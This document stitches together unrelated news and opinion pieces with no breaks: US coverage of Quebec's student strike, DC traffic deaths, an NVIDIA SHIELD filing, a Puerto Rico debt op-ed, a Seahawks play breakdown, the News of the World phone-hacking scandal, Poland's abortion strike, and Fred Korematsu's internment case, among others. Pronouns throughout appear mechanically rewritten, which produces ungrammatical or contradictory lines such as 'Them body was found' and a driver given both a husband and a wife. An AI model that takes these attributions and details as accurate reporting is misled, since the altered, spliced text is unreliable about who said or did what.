Reflecting news budget cuts that have closed many foreign news bureaus in recent years, several major news organizations, including the New York Times and the AP, which formerly had small news bureaus in Montreal, have pulled out of Quebec altogether. Both the first report by the Times, and some of the AP reporting, were thus filed from outside of Quebec, in Canada's capital of Ottawa.
Responding to the lack of coverage of the Quebec student strike in the U.S. press, Harper's publisher John MacArthur wrote that they were “ashamed” of their colleagues at other magazines and newspapers. They pointed out that the protests should have resonance with many Americans, given the number of U.S. students and parents suffering from the “obscenely high cost of four years of U.S. college education” today.
Yet, seeming to confirm the lack of interest in the strike in the Anglo-American corporate press, MacArthur's plea for their colleagues to pay attention to the significant events unfurling north of the border was published in a French-language Montreal newspaper, Le Devoir (6/4/12).
In spite of the media, the Quebec students' strike did ultimately find resonance with many Americans. Widely popularized through independent media initiatives like Montreal Media Coop and Democracy Now!, social networking sites, and two volunteer-run translation initiatives (QuebecProtest.com and RougeSquad.org), the red square that was the symbol of the student strike was soon taken up by activists across the U.S.
Isabel Macdonald is the former Communications Director at FAIR.
Pedestrian deaths tie with 2002 for lowest since at least 1931
The District logged the lowest number of traffic-related fatalities since at least the 1920s last year, and tied for the lowest numbers of pedestrians killed on record as well.
Only 19 people died in traffic-related crashes in the city in 2012, besting the previous record set three years ago, according to city statistics. Eight of the cases involved pedestrians, six were vehicle occupants and five rode motorcycles or scooters when killed. Not one was a bicyclist.
Despite two high-profile pedestrian deaths last month, including a 16-year-old killed in a hit-and-run, the number of pedestrians killed was tied with 2002 for the lowest number since the city started keeping such records in 1931.
The numbers are especially low compared with the peak set in 1934, when 135 people died in traffic crashes in the city, 95 of them pedestrians as trolleys and cars proliferated. But the statistics have declined markedly in recent years, dropping to a quarter of the 71 traffic deaths reported in 2001.
"We're moving in the direction we want to go," said District Department of Transportation spokesperson John Lisle.
John Townsend, a spokesperson for the AAA Mid-Atlantic motorist club, noted that the city appears to be bucking the national trends, as well. Nationally, vehicle fatalities had been dropping, they said, but preliminary data from the AAA Foundation for Traffic Safety indicate traffic deaths may have risen last year.
Still, the share of pedestrians getting killed in traffic-related crashes in the District remains high, representing 42 percent of all traffic-related fatalities last year. George Branyan, who coordinates DDOT's pedestrian program, said that ratio is similar to other large cities', noting that more than half of residents are walking, biking or taking transit to their jobs each day in the city. "It's an urbanized area," Branyan said. "That's what happens when you have one million people on the streets each day."
Additionally the drop comes as the city's population grows.
Branyan credits the proliferation of traffic cameras around the city with helping reduce the deaths. The District has 46 speed cameras and 47 red light cameras but plans to add 134 more this year.
"We still have a lot of crashes, but when two cars hit each other at 25 mph, it's a lot different than cars going 45 mph," they said. "It really matters for pedestrians. They don't have airbags and steel safety cages."
Townsend would like the numbers to drop even lower, though. "They can take pride in the fact that the city is becoming a lot safer. We all can," Townsend said. "But still we cannot rest on our laurels."
kweir@washingtonexaminer.com
NVIDIA SHIELD 2nd Gen Shown In New FCC Documents
A couple of days ago we talked about new NVIDIA SHIELD controllers showing up and we speculated a refresh or redesigned SHIELD TV 2nd Gen would surface short after. Looks like we weren't wrong according to the follow pictures from the FCC document. In addition it has gone through South Korea's FCC equivalent too.
The new Model # is P2897 and beyond being called an “Android TV Game Console” and having 802.11ac WiFi and BT 4.2 we can't tell more due to NVIDIA'S confidentiality requests submitted to the FCC. For now we have confirmation of something new on the horizon but what surprises NVIDIA has in store remains to be seen and it will be reported here once that information is made available.
Anthony Garera Anthony is usually tinkering with everything and anything because there's always one more thing to do, reviewing games and apps and complaining about things normal people don't think about. More Posts - Website Follow Me:
The Trump administration and Congress should act swiftly to prevent a federal oversight board from turning Puerto Rico into the next Argentina.
Thanks to its former Presidents Néstor and Cristina Kirchner, Argentina is widely regarded as an excellent case study in how not to restructure sovereign debt. Rather than negotiate in good faith with its creditors, Argentina attempted to dictate terms. Rather than respect U.S. law, Argentina flouted it. Argentina's high-handed tactics left the country bereft of international investment and brought disaster to its economy.
ADVERTISEMENT
Ironically, the bondholders (including my firm) that were not cowed ultimately recovered much more than if Argentina had reached a fair settlement when we had sought it much earlier. In contrast, Ukraine, Greece and Belize swiftly restructured their debts by negotiating constructively with their creditors.
Sadly, the federal oversight board for Puerto Rico has decided to turn that commonwealth into the next Argentina. The oversight board, composed of seven political appointees, was established by The Puerto Rico Oversight, Management and Economic Stability Act (PROMESA), a statute rushed through Congress last year.
Through extensive observation of the oversight board in my firm's capacity as a holder of Puerto Rico's general obligation (GO) bonds, I reached the conclusion two months ago that the board was determined to sabotage out-of-court restructuring negotiations and force Puerto Rico into bankruptcy. Unfortunately, I was right.
On May 2, my firm and several other leading GO bondholders were on the verge of cinching an out-of-court deal with Puerto Rico's government, when we were told that the oversight board had “pulled the plug” on this effort. The next morning, the oversight board filed Puerto Rico for bankruptcy.
This filing gave the unelected board the exclusive power to decide for Puerto Rico how its bankruptcy will be managed, thereby rendering the commonwealth's governor and legislators mere bystanders in the exorbitant saga that is about to unfold. The board's own lawyer will run the bankruptcy case for Puerto Rico — at Puerto Rico's expense. Despite Puerto Rico's aspirations to become a state, the oversight board is treating Puerto Rico like a colony.
The parallels with Argentina are striking. For starters, the oversight board has taken an extreme and unyielding position on Puerto Rico's ability to service its debt. The board insists that, over the next 10 years, Puerto Rico can only afford to spend about 7 percent of its revenues servicing debt. This percentage defies all commercial norms for sustainable debt service.
For example, Connecticut and Utah spend 12 percent and 15 percent of revenues, respectively, servicing their debts; and Puerto Rico's constitution limits its annual debt service to 15 percent of revenues. Moreover, the joint World Bank/IMF guidelines regard 18-22 percent of revenues as sustainable annual debt service for the poorest countries in the world (those nations far less developed than Puerto Rico).
The oversight board's radical position seems perfectly designed to prevent consensual deals, since bondholders cannot be expected to accommodate an indefensibly low assessment of Puerto Rico's debt service capacity.
Second, as noted above, the oversight board has repeatedly acted to delay and impede negotiations and even “pull the plug” on the deal the commonwealth nearly reached with the GO bondholders. Like the Kirchners in Argentina, the board members seem more interested in imposing their will than in allowing Puerto Rico to reach a swift and fair deal with creditors. We fear this hubris will impose a terrible price on Puerto Rico's economy and people, as it did in Argentina.
Third, the oversight board is flouting the law, including the explicit requirement in PROMESA that the fiscal plan “respect” the priorities and liens granted bondholders in Puerto Rico's constitution. While the constitution says the GO bonds come ahead of all other commonwealth expenditures, the board has certified a fiscal plan that demands the opposite. The oversight board offers no defense for its position but regularly points out instead that its decisions about the fiscal plan are exempt from judicial review.
The oversight board was supposed to impose financial discipline on a notoriously mismanaged government, which was in turn supposed to help the commonwealth efficiently reach consensual deals with its creditors and regain access to the capital markets. Emboldened by its oft-declared claim that it can act with impunity, the oversight board has perverted these goals.
If the board has its way, debt service will be cut by about 80 percent, but other expenditures will modestly increase over the coming decade — this at a time when Puerto Rico's nominal GNP and governmental revenues are both at all-time highs.
Now that the oversight board has complete control over Puerto Rico's handling of its bankruptcy, we fear fresh proof of the adage that absolute power corrupts absolutely. That will be a headache for my firm, but we will prevail because the law is on our side. Unfortunately, the people of Puerto Rico will end up bearing the burdens of this federally-created autocracy.
The oversight board has gone rogue and urgently needs adult supervision before lasting damage is done to Puerto Rico. Already, the board has flouted PROMESA, impeded consensual negotiations and pushed the commonwealth into a needless bankruptcy. Congress and the administration should require the oversight board to comply with PROMESA, or they should replace the board members with people who will.
Mark D. Brodsky is the CEO of Aurelius Capital Management, LP, a New York-based hedge fund.
The views expressed by contributors are their own and not the views of The Hill.
Following the U.S. Department of Labor's promulgation today of a fiduciary rule that will make it more complicated for older Americans to get retirement investment advice, FreedomWorks Foundation Executive Director Curt Levey commented:
“The new rule is costly and complicated. It will make it harder for the small businesses and individuals who provide retirement investment advice to stay in business, while raising the price of this advice such that only the wealthy will be able to afford it.”
“Like so many others examples of regulatory overreach, this rule is disguised as protection for consumers, when it really is a tangled web of red tape that deprives America's seniors of the freedom to plan for their retirement. We hope the Labor Department's attempted takeover of seniors' financial planning will be stopped by congressional action or litigation.”
FreedomWorks Foundation seeks to engage and educate Americans across all demographics on the principles of smaller government, lower taxes, free markets, personal liberty, and the rule of law. For more information, please visit www.FreedomWorks.org/Foundation, or contact Jason Pye at JPye@FreedomWorks.org.
Koei Tecmo has released new information, video, and screenshots of Dynasty Warriors: Godseekers detailing the strategy RPG strategic gameplay elements.
Get the information below.
Synchro Mode
Dynasty Warriors: Godseekers utilizes a tactical gameplay system wherein players strategically move their units across a battlefield to defeat opposing forces. Actions take place on a grid, with units moving a select set of spaces before carrying out offensive or defensive maneuvers. Cunningly attacking from the sides and rear of an enemy will deal significant amounts of damage, allowing units to be eliminated more efficiently. Defeating enemies successfully will enable Synchro Mode, which allows the user to unleash powerful attacks that can decimate an opposing force.
Lixia's Orbs
A useful companion in battle, Lixia has strong powers once sealed away into orbs. Lixia's Orbs are unique objects that can lend an upper hand against tougher opponents. Whether the player chooses to envelop the battlefield in flames or flood enemy strongholds, these elemental changes will break through defenses and reduce infantry numbers! Players will unlock and obtain a variety of Orbs through the story, each offering its own unique abilities.
Path of Destiny
Outside of combat, players can further immerse themselves in the fascinating Three Kingdoms period through conversations with other officers. Path of Destiny episodes are unlocked during encounters on the front lines, and provide access to unique battles, new companions, monetary bonuses and useful items.
Costumes
A selection of impressive costumes is available to those who purchase Dynasty Warriors: Godseekers within the game's first month of sale, allowing players to further personalize their gameplay experience. Lixia can switch their standard costume for the “Diaochan” costume, while Guan Yinping and Lu Lingqi will receive special costumes sporting fox ears and tails.
Aug 18, 2016; Seattle, WA, USA; Seattle Seahawks running back Chrsitine Michael (32) is tackled by Minnesota Vikings defensive end Everson Griffen (97) and defensive tackle Shamar Stephen (93) during the second quarter at CenturyLink Field. Mandatory Credit: Joe Nicholson-USA TODAY Sports
The Seattle Seahawks struggled offensively in short-yardage situation last Thursdays. The game tape shows a very simple reason as to why.
For the Seattle Seahawks, the most concerning issue from last Thursday's game against the Minnesota Vikings wasn't the final score. The final score doesn't matter for exhibition games, but not being able to do what you're supposed do best is a cause for concern. For Seattle, that mean being able to run the football when they need to.
Near the end of the first quarter the game was still scoreless. The Seahawks had taken their opening possession from their own three-yard line and driven out across midfield. A completed pass to Christine Michael on 2nd down left the Seahawks with third and one at the Minnesota 41-yard line.
The Seahawks brought in rookie Alex Collins at running back. On both third and forth downs Collins was stuffed, and the drive ended.
For a team that prides itself on being one of the top running offenses in the NFL, that failure was incredibly frustrating. It may only have been a meaningless preseason game, but there's a lot to be learned as to why the Seahawks couldn't get 1 yard when they needed to.
Let's take a look at both plays.
3rd and 1
The Seahawks set up with Wilson and Alex Collins in the backfield, and two receivers wide to the right side. The base play was a simple read-option, but with an interesting wrinkle.
On top of the give/keep read of the unblocked outside linebacker, Wilson had another option. Based on the coverage pre-snap, Wilson had the option to throw quickly to Kearse on the outside, skipping the run option entirely.
A lot to unpack here. Wilson had 3 options: Collins, keep it, bubble to Kearse. pic.twitter.com/atxDcMoxZn — Keith Myers (@MyersNFL) August 20, 2016
Wilson ultimately made the correct call. Both CBs were too close to the line to take the quick pass. The DE didn't crash inside, so they shouldn't have kept it. That left giving the ball to Collins as the correct decision.
So then what happened? Ultimately, the play failed because Gary Gilliam missed their block. They needed to block the defensive end that lined up in the B gap, just inside of their right shoulder.
Gilliam was unable to stay in front of the DE, and Collins was hit in the backfield. The unblocked OLB then came over and made sure Collins wasn't going to be able to break the tackle and pick up the first down.
See for yourself:
4th and 1
After the failure on third down, the Seahawks went with a much more conventional approach on fourth down. They lined up with Wilson under center and Collins deep. They went with pure man blocking, and ran Collins right up the gut.
Collins was stopped a yard short here. sigh… They need to read the blocks and look to their left. pic.twitter.com/zucvgInuEp — Keith Myers (@MyersNFL) August 20, 2016
Unfortunately, Collins took the way the play was drawn up a bit too literally. Tight end Nick Vannett and entire left side of the line got a great push, but Collins stuck to the clogged up A gap and never made it passed the line of scrimmage.
Ultimately the Seahawks failed to pick up the first down because, on both plays, someone didn't do their job. On the first play it was Gilliam. On the second it was Collins.
Often times that is all it takes. On those short yardage plays, both teams pack everyone in close to the line. If one guy makes a mistake, there's no room for the other guys to make up for it.
Overall though, it is important to keep in mind that this was just a preseason game. When the games count, we won't be seeing Collins in that spot. I have no doubt that Rawls or Michael would be able to pick up the first down there.
In April 2015 I'd never driven a motorcycle, had little experience camping, and was told by experts near and far my plan was sure to fail.
In May 2015 I bought an old motorcycle and even older sidecar, got my motorcycle license, learned to weld, built a subframe and attached the sidecar to the motorcycle.
In June 2015 I loaded my best friend, Baylor the Dog, into the sidecar and hit the road for Alaska.
400 days , and more than 40,000 miles later, we made it from Alaska to Florida and roundabouts in-between, spent more than 340 nights under the stars and learned that success isn't about a flawless run, rather defined by the act of trying.
Most of all I want you to know your wild goals are indeed achievable.
Just because you don't know how, doesn't mean you can't learn. Just because it seems impossible now doesn't mean it is. No matter your age, your dreams can become a reality. It won't always be easy and oftentimes it won't even be fun, but it will be a hundred percent worth it.
Trust me.
Scotland Yard's Assistant Commissioner says their decision not to reopen an investigation into News International in 2009 had been “a pretty crap one”, which they now deeply regretted.
In an exclusive interview with The Sunday Telegraph , Mr Yates also accuses senior executives at the Murdoch-owned company of failing to co-operate with the original Scotland Yard inquiry, first begun in 2005.
The newspaper had covered up the “industrial scale” of its phone hacking operation by insisting that one “rogue reporter” was to blame.
They say Scotland Yard's reputation had been “very damaged” by its failures and adds: “I have regrettably said the initial inquiry was a success. Clearly now that looks very different.”
Mr Yates had the opportunity to reopen the case in 2009 but chose not to do so after just eight hours' consideration, including consultations with other senior detectives and Crown Prosecution lawyers.
Their admission coincides with the News of the World publishing today for the last time in its 168-year history.
In a further series of twists in the phone hacking scandal, The Sunday Telegraph can reveal:
• Max Mosley, who won a privacy case against the News of the World over articles detailing their sadomasochistic sexual practices, has been secretly bankrolling civil cases being brought by phone hacking victims against the tabloid;
• Rebekah Brooks will be questioned by police in coming days, according to a senior News International source;
• Rupert Murdoch, who is expected to fly into Britain today, may be called to give evidence at a parliamentary inquiry;
• Mrs Brooks has written to the home affairs select committee, saying they had “no reason to believe” hacking had taken place at other News International titles.
In their interview, Mr Yates addresses last week's revelation that Glenn Mulcaire, a private investigator working for the News of the World, had allegedly hacked into teenage murder victim Milly Dowler's mobile phone and then deleted messages.
“We are all extremely shocked by it and it is a matter of massive regret we didn't deal with it earlier,” they say.
“My byword has always been you look after the victims and the job will always resolve itself. I always put the victim first but here I didn't follow my principle and that is my greatest regret.”
Milly Dowler's details — along with those of other alleged phone hacking victims including relatives of dead soldiers, 7/7 victims and the Soham schoolgirls killed by Ian Huntley — were contained in 11,000 pages of material seized by police when Mulcaire was first arrested in 2006. Mr Yates was asked by the Met Commissioner to look at the case again in July 2009, amid growing disquiet at the scale of the hacking.
They concluded within the space of a working day that there was no fresh material that could lead to further convictions.
Mr Yates says: “I didn't do a review. Had I known then what I know now — all bets are off: I would never have reached this conclusion … I am accountable and it happened on my watch and it's clear I could have done more.”
Of the News of the World's failure to disclose emails relating to the case until January this year — and whether that might constitute a criminal offence — they say: “That is a matter for the new team. In my view, it was extremely unhelpful to receive it five or six years later.”
Asked if they thought Mrs Brooks should quit, Mr Yates replies: “I think it is a matter for Rebekah, their company and their conscience.”
They say that any officers found to have been paid money by the News of the World for information would be jailed and adds that the whole scandal has been “a very damaging episode for us and we have got to work hard to rebuild the trust in the Met”. The police face being dragged through the civil courts by claimants, including Brian Paddick, the former deputy assistant commissioner, who accuse the Met of failing in their duty of care by neglecting to inform possible victims of phone hacking whose names appeared on Mulcaire's list.
Officers with Operation Weeting, the hacking investigation, are now combing Mulcaire's papers and contacting possible victims systematically.
One source close to the Metropolitan Police Authority said: “We have seen serious lapses of judgement right at the top of the Met.
“It would not surprise me if senior officers did things that now look stupid and potentially compromising — but that is not the same as something potentially criminal.”
Yesterday, speaking publicly for the first time since the announcement of the News of the World's closure, Rupert Murdoch said it was “a collective decision”.
Mr Murdoch, attending a media conference in Idaho in America, refused to elaborate. The mounting crisis has badly affected share prices in both News Corp, News International's parent company, and BSkyB, the broadcaster it part owns. Permission for a full takeover of BSkyB has been delayed by the Government as a result of the crisis and could be refused.
Tom Watson, the Labour MP who has played a central role in publicising many of the phone hacking allegations, called on Mr Murdoch to be hauled before MPs.
They said: “After James Murdoch's statement, in which they admitted that a parliamentary committee had been misled, I will insist that Rupert Murdoch, James Murdoch and Rebekah Brooks come to the Culture Media and Sport committee to explain themselves. Rupert Murdoch is the most powerful media mogul in the UK and they have never answered questions in Parliament.”
The Church of England's investment arm said it was considering withdrawing nearly £4 million worth of shares it holds in News Corp.
In a further development, Tony Blair was yesterday forced to deny allegations that they had contacted Gordon Brown before the last election to try to prevent Mr Watson pursuing phone hacking allegations.
In a final email to staff yesterday, Colin Myler, the outgoing editor of the News of the World, said: “I could not have been more proud or privileged to have you as my colleagues. Let's try to make the most of this incredibly sad but historic day.”
The man they replaced, Andy Coulson, who was arrested on Friday, said outside their home yesterday that they really “felt for” staff facing redundancy.
It also emerged yesterday that Mrs Brooks wrote last week to Keith Vaz, chairperson of the home affairs select committee, which is planning to question a series of people over the scandal.
They will question police this week.
Mrs Brooks told them there was “no reason to believe” the practice had taken place at News International's other titles — which include the Sun, the Times and the Sunday Times.
They also reiterated their denial of any knowledge of hacking during their editorship.Last night David Cameron set broad terms for the twin inquiries that will be conducted to explore the issues raised by the phone hacking scandal. The first, led by a judge to be appointed by the Lord Chief Justice, Lord Judge, will be held in public and have the power to summon witnesses to be cross-examined under oath.
It will focus on phone hacking allegations and any other allegedly illegal or improper acts at the News of the World or any other newspaper and the way these were investigated by police.
For the second inquiry, a “credible panel of senior figures”, will be asked to recommend a new framework for press regulation — striking a suitable balance between the importance of maintaining a free press and protecting the rights of individuals, Mr Cameron said.
Glasgow City Council has been accused of stalling a parking appeal which could find that a driver has been unlawfully penalised because warning signs near Hampden Park are almost five metres high.
The Scottish Parking Appeals Service is considering a case brought by one motorist who was given a £30 fixed penalty for parking in Kingshill Drive during a Diamond League athletics event on July 12 2014.
Both the driver and their husband, who have asked not to be named, said they could not see signs from their car which warn that dozens of streets around the stadium are part of a ‘Restricted Permit Zone'.
Official paperwork suggests the signs should be 4.2 metres from the ground but some are almost five metres high.
At an earlier hearing the driver's husband told Adjudicator Ian Kennedy that they are “unlawful”.
If the appeal is upheld, it could mean that thousands of drivers have been unfairly fined by the local authority.
Figures produced at the hearing show 6,199 fines were issued in the two years from January 1 2013.
Many of the fixed penalty notices will have already been paid by sports fans who attended Commonwealth Games events and cup finals.
The case was adjourned for 28 days after the first hearing on June 29 and now Glasgow City Council has secured a second adjournment.
A letter from the Parking Appeals Service seen by the Evening Times states: “As you know the adjudicator adjourned the case for a period of 28 days and requested that the points raised in the adjournment notice be addressed by July 31.
“Glasgow City Council has however asked the Adjudicator to further adjourn the case to allow the council to seek legal advice.
“The adjudicator has agreed to an extension time for a further 28 days until August 28 to allow the council to seek and obtain legal advice.”
The motorist who has fought a year long legal battle against the parking fine said: “Whilst this suggests Glasgow City Council is now on the back foot, it does mean that I may be up against a posse of solicitors and that the process is now likely to drag on.”
They have previously insisted that they and their wife “genuinely didn't see the signs” and “wouldn't have parked there if they had”.
Speaking at the initial hearing on June 23, they said: “To set out to install signs on 4.2 metre poles and then to actually install signs at 4.7 and 4.8 metres shows negligence on the part of Glasgow City Council.
“I strongly believe that this will have been brought to the council's attention before now because there have been more than 6000 penalty charge notices issued in that area.
“I believe that there is a public interest to be served so that councils are dissuaded from behaving disingenuously and effectively extorting money from motorists in future.”
Adjudicator Ian Kennedy said: “If it's a problem for you, it may be a problem for others.”
A spokesperson for Glasgow City Council said: “Everyone has the right to appeal and as this is currently with the independent adjudicator, it would be inappropriate for us to comment while this process is ongoing.”
Polish Women Hold 'Black Monday' Strike To Protest Proposed Abortion Ban
Enlarge this image toggle caption Janek Skarzynski/AFP/Getty Images Janek Skarzynski/AFP/Getty Images
On a gray and rainy day, they poured onto the streets of Polish cities by the thousands. The women wore black, waved black flags and raised black umbrellas overhead — gathering on "Black Monday" to protest a proposed ban on abortion.
In Poland, abortion is already illegal except in cases of rape, incest, danger to the mother's life or irreparable damage to a fetus. The legislature is now proposing an absolute ban, carrying jail time of up to five years for both women and their doctors no matter the circumstances of the abortion, The Associated Press reports.
In response to the proposal, Polish women and some men went on strike Monday, boycotting work and school in Warsaw, Gdansk, Wroclaw and across the country, according to the AP.
Meanwhile there were counterprotests and special Catholic Masses held to support the proposal, the news service writes, and the Polish foreign minister said the protests were "creating artificial problems."
Enlarge this image toggle caption Alik Keplicz/AP Alik Keplicz/AP
Monday's action "caused widespread disruption to businesses, traffic and to government offices," Reuters reports. In addition to the strike and marches, there were blood-donation drives and book readings, and some teachers taught classes while wearing all black, the wire service says.
Foreign Minister Witold Waszczykowski told a radio station that the right to life is an "important moral challenge," and dismissed protesters by saying "let them have fun," Reuters says.
It's difficult to gauge exactly how many people participated in the strike, but both wire services report that it numbered in the thousands. The AP says that in major cities, participation was obvious, with shops closed and police estimating that some 17,000 people were gathered in downtown Warsaw.
The AP spoke to several of those protesters:
"Coffee shops were filled with groups of women dressed head to toe ahead of the main rally. "One was 34-year-old banker Agnieszka Krysztopolska, who sat in a Starbuck's shop with several friends who were all boycotting work. " 'I have two children and it's not like I am some kind of hardline feminist but I do not agree with somebody depriving me of the right to my own health or that of my children. I think this bill is just dangerous,' they said. "Near her, 28-year-old Magdalena Gwozdz chatted with their 17-year-old sister, who was boycotting school. "This should be a woman's choice and abortion should be available in case of rape or a damaged fetus," Gwozdz said. "This is Europe and we are in the European Union."
Poland, which is largely Catholic, already has some of the most restrictive abortion limits in Europe.
A professor of gender studies at Warsaw University told the National Catholic Reporter earlier this summer that in addition to criminalizing all abortions, the proposed change in the law could also cause women to be imprisoned for a miscarriage if they couldn't prove it was not induced.
Enlarge this image toggle caption Czarek Sokolowski/AP Czarek Sokolowski/AP
Miscarriages could lead to a prison term of up to three years, Elzbieta Korolczuk told the publication.
Korolczuk also told the NCR the law would make doctors afraid to intervene in ectopic pregnancies — when a fertilized egg implants outside the uterus, a situation that is dangerous for the mother and almost always fatal for the fetus.
From The Archives From The Archives 2003: Dutch 'Abortion' Boat Will Offer Polish Women Birth Control, RU-486 Dutch 'Abortion' Boat Aids Polish Women Listen
Reuters reports that some critics have said the law would even discourage doctors from doing prenatal tests, if they carried the risk of miscarriage.
For months, activists in Poland have expressed concerns about the prospect of a total abortion ban.
The conservative Law and Justice Party, a nationalist, pro-Catholic, Euroskeptic and anti-immigrant party, won control of Poland's parliament last year. The party also controls the presidency, and soon moved to curtail the power of Poland's constitutional court. Canada's CBC writes that the party then took control of public broadcasting in Poland.
As NPR wrote in December, after the constraints on the judicial branch were imposed, some women's rights groups in Poland worried that the party would use its consolidated power to criminalize abortion and restrict sex education.
Now the abortion ban is officially on the table.
The proposal was inspired by a petition signed by 450,000 people, the AP writes; more than 38 million people live in Poland.
Polish Prime Minister Beata Szydło, of the Law and Justice party, has said they support the total ban on abortion, The Guardian reported earlier this year.
The Catholic Church also supports the proposed law, the CBC notes, but polls of the Polish public find some 74 percent of respondents do not want the current abortion laws changed.
The draft law was "adopted in principle by a large majority in parliament" in late September, the CBC writes, and is now in committee.
On Wednesday, the AP reports, the European Union's Parliament will be debating the "situation of women in Poland," given the proposed abortion ban.
Box cutter blades found in Trump-Pence sign (KTVT/screen grab)
An election worker in Plano, Texas was reportedly injured by box cutter blades that were hidden in a Trump-Pence campaign sign.
The Dallas Morning News reported that the sign was found zip-tied to an official polling site sign at 2800 East Spring Creek Parkway at Collin College.
According to KTVT, the sign was placed where the suspect knew that poll workers would have to remove it. And after a precinct official ordered the sign taken down, a volunteer was sliced open by the hidden box cutter blades. The blades drew blood but luckily the cuts were not serious.
County Democratic campaign chair Steve Spainhouer told KTVT that the incident was “deplorable.”
“It just shows how far we have come in politics where people want to be so mean and so hateful to try and injure somebody who's probably not got any political party persuasion one way or the other,” Spainhouer said. “I think most people have already made their minds up at this point how they're going to vote and so there's nothing to gain by being mean spirited or hateful.”
The Texas Rangers were reportedly investigating the incident at the request of precinct officials. Collin College said in a statement that all signs on campus were being inspected for sharp objects.
Watch the video below from KTVT, broadcast Nov. 2, 2016.
Arizona voters are receiving a phone message from Oscar-winning actor Susan Sarandon, encouraging them to “vote for taxing and regulating marijuana by voting ‘yes' on Prop. 205.” The full message can be heard in a video available below and at https://youtu.be/nQey4RzF-og.
“Whether someone uses marijuana or not,” they say, “we probably all prefer for law enforcement to spend their time preventing and investigating serious crimes rather than marijuana offenses. Also, regulating marijuana will take it out of the hands of criminals and instead generate jobs and tax revenues.”
Sarandon is not the first celebrity to voice their support for Prop. 205. Earlier this month, the Campaign to Regulate Marijuana Like Alcohol (CRMLA) aired a television ad featuring Super Bowl champion quarterback Jim McMahon during a Thursday Night Football match-up between two of their former teams, the Chicago Bears and Green Bay Packers.
“Ms. Sarandon is one of the most widely recognized and well-respected actores in the nation,” said CRMLA Chairman J.P. Holyoak. “She has been an outspoken advocate for social justice and sensible criminal justice reform, and we are proud to have their support. Like most Arizonans, they do not think adults should be slapped with felonies simply for consuming a substance that is less harmful than alcohol.”
In 2013, Sarandon told The Huffington Post, “It's ridiculous that we continue to incarcerate anyone for using a substance that actually causes far less damage than alcohol. No one goes out looking for fights on marijuana. No one dies from marijuana intoxication. And no one should be jailed for possessing marijuana.”
Source: Arizona legalization campaign press release
The tragedy happened on a military base in the west of Germany
Them body was found two hours later near the balloon, 40 miles (70km) away.
The freak accident happened when the girl became entangled in the mooring ropes of the balloon as it was taken by high winds.
It was about to be used for fun rides at a British military show at Rheindalen, near Moenchengladbach in western Germany.
British military spokesperson Lt Col Helen Wildman said the plan was to lift people up and down with the balloon tethered to a rope on a hot, sunny day.
When the weather suddenly changed, high winds caught a large helium balloon that was tied to the ground.
The weather was very nice but suddenly it changed and it became extremely stormy
Lt Col Helen Wildman
They told BBC Radio 5 Live: "The weather was very nice but suddenly it changed and it became extremely stormy.
"The balloon broke away from the rope and flew away.
"Unfortunately, the rope got tangled with a five-year-old girl and dragged them away with the balloon.
"She was lifted in the air."
Counselling
The balloon was recovered first and the girl's body found nearby soon after.
Lt Col Wildman said nothing like this had ever happened before.
The parents, who are British service personnel, are being given psychological support.
The rest of the military show, which was to continue until Monday, has been cancelled.
Fred Korematsu at their home in San Leandro, Calif., in 1996. An executive order sent them and other Japanese Americans into internment camps during World War II. (Robin Weiner/AP file)
The documents would expose everything: the racism inherent in the president's executive order, the cynical politics behind it, the lies told in court to defend it.
Peter Irons was sure of this. The lawyer had stumbled across the papers in a government storeroom: secret admissions from U.S. officials that a supposed matter of national security was not what it appeared.
The executive order led to abrupt expulsions, mass detentions and the persecution of thousands on the basis of their ethnicity, but it was false to the core.
Irons intended to prove it. But they could not do it by himself.
With the documents in hand and a knot in their stomach, they stepped out of a taxi in San Leandro, Calif., in 1982 and walked up to Fred Korematsu's house.
Irons knew the man only by reputation. Long ago, Korematsu had been arrested in this city, their home town, for defying an executive order that led to the expulsion or imprisonment of more than 100,000 Japanese Americans after Japan bombed Pearl Harbor.
Korematsu had gone to court to fight it, much as others now oppose President Trump's executive order barring people from seven majority-Muslim countries from entering the United States.
Korematsu lost, in 1944, in the Supreme Court. Defeat changed him. For decades, they had been living quietly in a small house, refusing to discuss their case with anyone, even their children, blaming themselves for what their government did to their people.
[Trump is not-so-subtly threatening the judicial system, and even their Supreme Court nominee is upset]
It had taken Irons two letters and a phone call just to get an audience in Korematsu's living room. Now they sat across from the man, nervous, hoping that seeing incriminating documents the government had kept secret during their trial would convince them to fight again.
Korematsu was a quiet man. They sat in their chair, puffed on their pipe and read Irons's papers in total silence.
“At least 20 minutes passed without a single word being said,” Irons recalled. “Then they looked over at me.”
“He said: ‘Would you be my lawyer?'”
Today, more than 30 years after they convinced Korematsu to challenge, for the second time, what is widely considered one of the most unjust government actions in U.S. history, Irons is closely watching another legal battle.
They watch the State of Washington and State of Minnesota v. Trump — another “poorly conceived, hastily executed, blanket dragnet,” as they see it. And others do, too.
“The Trump executive order assumed people are dangerous because they're Muslims, from Muslim-specific countries,” said Erwin Chemerinsky, who is dean of the law school at the University of California at Irvine and once called the Supreme Court's ruling against Korematsu “one of the worst decisions in history.”
“That's the fundamental flaw in both Korematsu and the Trump executive order,” Chemerinsky said. “To assume people are dangerous because of their race.”
As a young man in San Leandro, Korematsu once had a surgeon cut a bit of flesh from their eyelids — to look less Japanese, less suspicious to their neighbors.
It didn't work.
They were not yet 23 on the day Japanese war planes killed more than 2,000 at Pearl Harbor.
Fred Korematsu, circa 1940s. (courtesy of Fred T. Korematsu Institute)
Two months later, as they began to fight a world war, President Franklin D. Roosevelt signed an executive order on Feb. 19, 1942, exactly 75 years ago, that led to the roundup and imprisonment of every Japanese American on the West Coast.
Korematsu's parents and siblings reported to military officials, who took them from their home to live in converted horse pens while permanent internment camps were constructed in other states.
Korematsu refused to go.
“My father was not a complicated man,” said Karen Korematsu. “He had learned about the Constitution in high school. They thought they had civil rights as an American citizen.”
So they made up a fake name and laid low in a rooming house. They lasted only a few weeks before they were spotted and arrested.
Feb. 19, 2017, marked the seventy-fifth anniversary of when President Franklin D. Roosevelt signed an executive order that authorized the imprisonment of Japanese Americans during World War II. About 120,000 were held at 10 camps because of fears that Japanese Americans were enemy sympathizers. (Reuters)
A director for the American Civil Liberties Union visited Korematsu in jail. Roosevelt's order was popular in polls at the time, but the ACLU thought a judge would agree it was wrong.
[Many Americans support Trump's immigration order. Many Americans backed Japanese internment camps, too.]
“My father really believed that,” Karen Korematsu said. “He thought, certainly, the Supreme Court would think this was unconstitutional.”
Korematsu did not get to see much of their case as they were shuffled from jail to jail, then to an internment camp.
Their daughter said some other Japanese prisoners looked down on them for causing a stir.
When the case reached the country's highest court, one Supreme Court judge strongly agreed with Korematsu — writing that their federal conviction for merely staying home “falls into the ugly abyss of racism.”
